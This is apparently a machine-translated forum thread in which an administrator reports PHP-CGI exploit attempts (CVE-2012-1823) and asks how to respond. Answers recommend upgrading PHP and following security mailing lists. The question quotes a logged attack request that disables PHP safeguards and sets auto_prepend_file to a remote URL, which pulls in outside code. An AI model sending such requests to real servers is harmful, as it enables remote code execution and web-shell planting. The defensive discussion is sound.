Сегодня я получаю несколько попыток использования уязвимостей с разных IP-адресов.
ПОЛУЧИТЬ /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F%
Содержимое info3.txt:
Google показывает группу людей, говорящих об этом в течение последних нескольких дней, но никаких реальных решений или объяснений того, что это такое. Есть запись по адресу: http://huguesjohnson.com/programming/hacking-attempt/
«Я думаю, что это то место, где я пока что оставлю. Я не знаю, является ли этот сайт частью преступной сети, но, поскольку у него есть доступ к ботнету, я предполагаю, что это так. IP 81.17.24.82 нигде не появляется в качестве распространителя вредоносного ПО, что странно. Может быть, это недавно взломанный веб-сервер или IP-адрес, недавно полученный тем, кто организовал эту атаку ».
Мой вопрос: что делать дальше в подобных ситуациях? Есть ли передовая практика, которой должны следовать администраторы, чтобы уведомить специалистов по безопасности? За какими сайтами вы следите, чтобы быть в курсе таких вещей и применять надлежащие меры безопасности (например, mod_security)?
Очевидно, что они пытаются использовать недавнюю ошибку, обнаруженную в PHP при настройке как CGI (CVE-2012-1823).
Чего они пытаются достичь в итоге, мы можем только догадываться, пока не получим известие от людей, которые действительно были скомпрометированы и впоследствии проанализировали сервер.
Судя по тому, как это выглядит на данный момент, на этих серверах пытаются запустить оболочку C99. Мы пока не можем связать это с рекрутингом ботнетов или какой-либо другой целью.
Как администратор вы обязательно должны убедиться, что вы не уязвимы для этой атаки.
В данном случае это необходимо для проверки того, что у вас развернут PHP> = 5.3.12.
Вы можете попытаться связаться со службой поддержки владельца IP-адреса, с которого исходит атака, и IP-адреса, на котором размещается info3.txt. Но этого поставщика, вероятно, не очень впечатлит ваше заявление.
Уведомить сотрудников службы безопасности?
Нет, я бы не стал, он пытается использовать известную ошибку.
Я счел полезным подписаться на рассылку безопасности и / или объявить список рассылки программного обеспечения, которое я публикую в Интернете, и нашей базовой операционной системы.
Таким образом я быстро получаю уведомления о проблемах с безопасностью и новых выпусках, которые меня действительно беспокоят.